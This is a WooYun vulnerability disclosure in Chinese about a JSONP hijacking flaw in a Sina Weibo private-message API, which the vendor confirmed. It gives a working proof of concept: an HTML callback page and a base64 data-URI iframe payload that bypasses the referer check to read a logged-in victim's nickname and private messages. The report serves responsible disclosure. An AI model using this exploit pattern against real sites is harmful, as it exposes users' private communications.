你点我的链接我就可以知道你的微博昵称和你的部分私信

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166571

漏洞标题：你点我的链接我就可以知道你的微博昵称和你的部分私信

漏洞作者： salt

提交时间：2016-01-01 09:19

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：CSRF

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2016-01-01：细节已通知厂商并且等待厂商处理中
2016-01-01：厂商已经确认，细节仅向厂商公开
2016-01-11：细节向核心白帽子及相关领域专家公开
2016-01-21：细节向普通白帽子公开
2016-01-31：细节向实习白帽子公开
2016-02-12：细节向公众公开

简要描述：

我扶了扶眼镜框。。

详细说明：

新浪获取部分私信的接口存在jsonp劫持漏洞。
http://api.weibo.com/webim/2/direct_messages/contacts.json?source=209678993&count=200&add_virtual_user=5,&is_include_group=0&callback=STK_14511436516391
在登录微博的情况下访问以上接口会得到一个私信的列表，从中可以提取出部分私信已经双方的昵称来。这个接口做了referer检查，但是允许referer为空。用iframe的data伪协议即可绕过

漏洞证明：

构造获取信息并进行操作的页面。

<head>
<meta http-equiv="Content-Type" content="text/html;charset=utf-8">
</head>
<body>
<script>
function STK_14511436516391(data){
	var nickname = "";
	var doc = "";
	for (var i = 0; i < data.data.contacts.length; i++) {
		username = data.data.contacts[i].user.name
		msg = data.data.contacts[i].message.text
		nickname = data.data.contacts[i].message.recipient_screen_name
		doc += username+":<br>"+msg+"<br><br>"
	}
	doc = "Hello "+nickname+", here is your latest private message list:<br><br>"+doc
	document.write(doc)
}
</script>
<script src="http://api.weibo.com/webim/2/direct_messages/contacts.json?source=209678993&count=200&add_virtual_user=5,&is_include_group=0&callback=STK_14511436516391"></script>
</body>

用iframe解决referer问题。即最终payload为：

<iframe src="data:text/html;base64,PGhlYWQ+CjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVudD0idGV4dC9odG1sO2NoYXJzZXQ9dXRmLTgiPgo8L2hlYWQ+Cjxib2R5Pgo8c2NyaXB0PgpmdW5jdGlvbiBTVEtfMTQ1MTE0MzY1MTYzOTEoZGF0YSl7Cgl2YXIgbmlja25hbWUgPSAiIjsKCXZhciBkb2MgPSAiIjsKCWZvciAodmFyIGkgPSAwOyBpIDwgZGF0YS5kYXRhLmNvbnRhY3RzLmxlbmd0aDsgaSsrKSB7CgkJdXNlcm5hbWUgPSBkYXRhLmRhdGEuY29udGFjdHNbaV0udXNlci5uYW1lCgkJbXNnID0gZGF0YS5kYXRhLmNvbnRhY3RzW2ldLm1lc3NhZ2UudGV4dAoJCW5pY2tuYW1lID0gZGF0YS5kYXRhLmNvbnRhY3RzW2ldLm1lc3NhZ2UucmVjaXBpZW50X3NjcmVlbl9uYW1lCgkJZG9jICs9IHVzZXJuYW1lKyI6PGJyPiIrbXNnKyI8YnI+PGJyPiIKCX0KCWRvYyA9ICJIZWxsbyAiK25pY2tuYW1lKyIsIGhlcmUgaXMgeW91ciBsYXRlc3QgcHJpdmF0ZSBtZXNzYWdlIGxpc3Q6PGJyPjxicj4iK2RvYwoJZG9jdW1lbnQud3JpdGUoZG9jKQp9Cjwvc2NyaXB0Pgo8c2NyaXB0IHNyYz0iaHR0cDovL2FwaS53ZWliby5jb20vd2ViaW0vMi9kaXJlY3RfbWVzc2FnZXMvY29udGFjdHMuanNvbj9zb3VyY2U9MjA5Njc4OTkzJmNvdW50PTIwMCZhZGRfdmlydHVhbF91c2VyPTUsJmlzX2luY2x1ZGVfZ3JvdXA9MCZjYWxsYmFjaz1TVEtfMTQ1MTE0MzY1MTYzOTEiPjwvc2NyaXB0Pgo8L2JvZHk+" width="100%" height="100%">

将上面代码保存为1.html，打开并且更改显示编码为UTF-8即可看到昵称和部分私信。

修复方案：

不允许空的referer？好像这样也会出一些奇怪的问题。。
加一些不可预测的参数吧
你们比我懂！

版权声明：转载请注明来源 salt@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：3

确认时间：2016-01-01 23:06

厂商回复：

感谢关注新浪安全，问题修复中。

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166571

漏洞标题：你点我的链接我就可以知道你的微博昵称和你的部分私信

相关厂商：新浪微博

漏洞作者： salt

提交时间：2016-01-01 09:19

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：CSRF

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 salt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2016-0166571

漏洞标题：你点我的链接我就可以知道你的微博昵称和你的部分私信

相关厂商：新浪微博

漏洞作者： salt

提交时间：2016-01-01 09:19

修复时间：2016-02-12 18:49

公开时间：2016-02-12 18:49

漏洞类型：CSRF

危害等级：低

自评Rank：5

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2016-0166571"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 salt@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞概要关注数(24) 关注此漏洞

Tags标签：无

4人收藏收藏
分享漏洞：